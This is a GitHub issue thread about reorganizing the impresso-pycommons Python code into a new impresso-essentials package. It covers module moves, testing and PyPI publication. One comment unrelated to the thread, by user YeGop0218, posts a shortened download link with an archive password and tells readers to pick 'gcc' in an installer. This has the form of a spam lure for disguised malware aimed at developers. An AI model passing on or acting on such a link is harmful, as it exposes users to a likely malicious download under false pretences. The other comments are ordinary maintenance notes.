### ISSUE TITLE
Impresso-pycommons reorganization

### ISSUE THREAD

**Issue by piconti** [impresso/impresso-essentials#1]
As mentioned in this [issue](https://github.com/impresso/impresso-text-acquisition/issues/133), it was decided to separate the modules of [impresso-commons](https://github.com/impresso/impresso-pycommons/tree/master?tab=readme-ov-file) into two:
- the rebuilder is added to text-acquisition
- some ot the remaining modules are reorganized and put into a new package when deemed useful to all: impresso-essentials.

This issue is thus for this second part of this restructuration, as described [here](https://docs.google.com/spreadsheets/d/1crtjgpi05JmSDZrBJSrzkQLXxACyN2bBvarL9LIRl3g/edit?gid=1960162917#gid=1960162917).
- [x] `utils.s3.py` -> moved to a new `io` module, potentially merged with `s3_delete.py`.
- [x] `utils.s3_delete.py` -> moved to a new `io` module
- [x] `utils.umia.py` -> kept in current impresso_commons as legacy, moved to another repo if needed.
- [x] `utils.utils.py` -> kept as-is but as module and not as submodule
- [x] `utils.dask_utils` -> moved to new `data_processing` submodule, keeping only relevant functions
- [x] `utils.config_loader.py` -> removed
- [x] `path.path_s3.py` -> moved to new `io` module
- [x] `path.path_fs.py` -> moved to  impresso-text-acquisition, keeping only relevant functions
- [x] `images.img_utils.py` -> kept in current impresso_commons as legacy, moved to another repo if needed.
- [x] `images.olive_boxes.py` -> kept in current impresso_commons as legacy, moved to another repo if needed.
- [x] `classes.contentitem.py` -> kept in current impresso_commons as legacy, moved to another repo if needed.
- [x] `text.rebuilder.py` -> moved to impresso-text-acquisition
- [x] `text.helpers.py` ->  moved to impresso-text-acquisition
- [x] `versioning.data_manifest.py` -> kept as-is in a `versioning` module
- [x] `versioning.data_statistics.py` -> kept as-is in a `versioning` module
- [x] `versioning.helpers.py`-> kept as-is in a `versioning` module
- [x] `versioning.compute_manifest.py` -> kept as-is in a `versioning` module
- [x] `schemas` -> kept as-is

Potentially, other modules and submodules might be added, in a `text` submodules. These are modules hgihly reusable for text processing:
- `text_utils.py`
- `tokenization_utils.py`
- `ner_utils.py`
to be added by @EmanuelaBoros.

In addition to these modifications, all the code needs to be
- [x] documented
- [ ] tested
- [x] published to pipy

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by piconti** [comment]
Other tasks and things that are to do/were done as part of this migration:

- [ ] Move all relevant pycommons issues to essentials
- [ ] update `KNOWN_JOURNALS` with the new titles, and make it a dict to include the origin partner of the title.
- [ ] Add `data`, `config` and `logs` directories
- [ ] Reinstantiate `schemas` as a git submodule
- [ ] Perform small fixes to the manifests
   - Remove rebuilt-evenized as a data stage, since it's not used 
   - fix the example config with `push_to_git` set to `true`, and set it to `None` by default when instantiating the manifest
   - move data aggregation functions from `versioning.helpers` to a new `versioning.aggregators` module.

**Comment by piconti** [comment]
The package was published to pypi. 
Almost all functions of `impresso_essentials.io.s3` were newly tested, but not all functions of the package could be tested due to a lack of time. 
It would be useful for them to also be tested eventually, a separate issue will be created for this.

**Comment by piconti** [comment]
After checking which issues in [impresso-pycommons](https://github.com/impresso/impresso-pycommons/issues) might be relevant for essentials, it seems that only the ones relating to test coverage are worth propagating here.
